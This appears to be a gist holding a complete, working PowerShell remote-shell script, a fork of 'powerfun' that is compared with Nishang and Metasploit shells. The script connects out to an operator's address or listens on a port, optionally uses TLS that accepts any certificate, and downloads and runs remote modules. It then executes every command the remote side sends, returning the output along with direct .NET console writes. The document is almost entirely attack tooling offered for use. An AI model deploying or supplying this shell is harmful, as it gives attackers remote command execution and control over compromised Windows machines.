Created
July 21, 2019 19:00
Nishang shells, like their Metasploit counterpart "powerfun.ps1", only relay PowerShell pipeline output; anything a .NET method writes directly to Console.Out (e.g. Console.WriteLine from a loaded assembly) is lost. Redirecting Console.Out to a StringWriter around each Invoke-Expression and appending its contents to the response fixes this, which is helpful when running assemblies through the shell.
# Powerfun - Written by Ben Turner & Dave Hardy
# Forked for a few quick fixes (console-output capture for .NET methods).
# Returns a WebClient that authenticates to web servers with the current
# user's default credentials and hands the same credentials to the system
# proxy, so module downloads work from behind an authenticating proxy.
function Get-Webclient
{
    $client = New-Object -TypeName Net.WebClient
    $client.UseDefaultCredentials = $true
    # Reuse the default credentials for the proxy as well.
    $client.Proxy.Credentials = $client.Credentials
    return $client
}
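# Interactive PowerShell shell over a single TCP connection (bind or reverse),
# optionally wrapped in TLS. Every chunk read from the socket is executed with
# Invoke-Expression; pipeline output, the error stream and anything the command
# wrote straight to Console.Out are sent back, followed by a fresh prompt.
#
# Parameters
#   -Command   "bind": listen on -Port and accept one client.
#              "reverse": connect out to -Address:-Port.
#              Anything else is rejected with a terminating error.
#   -Sslcon    "true" wraps the socket in an SslStream and performs a
#              client-side TLS handshake using -Address as the target host.
#   -Download  "true" fetches each URL in -Modules with Get-Webclient and runs
#              it through Invoke-Expression before the prompt loop starts.
#   -Address   Remote host for "reverse" mode; also the TLS target host name.
#   -Port      TCP port to listen on ("bind") or connect to ("reverse").
#   -Modules   URLs of scripts to load when -Download is "true". Defaults to
#              none (the original hard-coded an empty list here).
#
# The remote side is trusted completely: whatever it sends is executed in
# this process with this user's privileges.
function powerfun
{
    Param(
        [String]$Command,
        [String]$Sslcon,
        [String]$Download,
        [String]$Address,
        [Int]$Port,
        [String[]]$Modules = @()
    )
    Process {
        $listener = $null
        $client = $null
        $stream = $null
        $ascii = [Text.Encoding]::ASCII
        # Console.Out is redirected to a StringWriter for every command below.
        # Keep the real writer so it can be put back when the session ends;
        # otherwise a dropped connection leaves this process writing all of its
        # console output into a dead StringWriter for the rest of its life.
        $originalOut = [Console]::Out
        try
        {
            if ($Command -eq "bind")
            {
                $listener = [System.Net.Sockets.TcpListener]$Port
                $listener.Start()
                $client = $listener.AcceptTcpClient()
            }
            elseif ($Command -eq "reverse")
            {
                $client = New-Object System.Net.Sockets.TCPClient("$Address",$Port)
            }
            else
            {
                # Previously this fell through to a null-method error on GetStream().
                throw "powerfun: -Command must be 'bind' or 'reverse', got '$Command'."
            }
            $stream = $client.GetStream()
            if ($Sslcon -eq "true")
            {
                # SECURITY: the validation callback returns $True for every
                # certificate, so any endpoint - including an interceptor - is
                # accepted. This protects only against passive capture; pin the
                # handler's certificate here if an active MITM of the C2 channel
                # is in your threat model. Note that even in bind mode this does
                # a *client* handshake toward -Address, exactly as the original did.
                $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
                $sslStream.AuthenticateAsClient("$Address")
                $stream = $sslStream
            }
            # 20001-byte receive buffer, the same size as the original 0..20000 fill.
            $bytes = New-Object byte[] 20001
            $banner = "Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n"
            $sendbytes = $ascii.GetBytes($banner)
            $stream.Write($sendbytes,0,$sendbytes.Length)
            if ($Download -eq "true")
            {
                $sendbytes = $ascii.GetBytes("[+] Loading modules.`n")
                $stream.Write($sendbytes,0,$sendbytes.Length)
                ForEach ($module in $Modules)
                {
                    # Code fetched here is executed immediately; over plain http://
                    # it can be swapped in transit, so prefer https:// URLs.
                    (Get-Webclient).DownloadString($module)|Invoke-Expression
                }
            }
            $sendbytes = $ascii.GetBytes('PS ' + (Get-Location).Path + '>')
            $stream.Write($sendbytes,0,$sendbytes.Length)
            # Each Read() is treated as one complete command, as in the original:
            # a command that arrives split across TCP segments is executed in
            # pieces. Operators should send one line per command.
            while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
            {
                $data = $ascii.GetString($bytes,0, $i)
                [Console]::OutputEncoding = [System.Text.Encoding]::ASCII
                # Capture direct Console.Out writes (e.g. from .NET assemblies)
                # that the pipeline redirection below would otherwise miss.
                $consoleOutput = New-Object -TypeName System.IO.StringWriter
                [Console]::SetOut($consoleOutput)
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
                $sendback = $sendback + $consoleOutput.ToString()
                $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
                # The most recent error is appended after the prompt, then cleared
                # so it is not reported again on the next command.
                $x = ($error[0] | Out-String)
                $error.clear()
                $sendback2 = $sendback2 + $x
                $sendbyte = $ascii.GetBytes($sendback2)
                $stream.Write($sendbyte,0,$sendbyte.Length)
                $stream.Flush()
            }
        }
        finally
        {
            [Console]::SetOut($originalOut)
            # Close only what was actually opened: in reverse mode there is no
            # listener, and the original's unconditional Stop() threw on $null.
            if ($client) { $client.Close() }
            if ($listener) { $listener.Stop() }
        }
    }
}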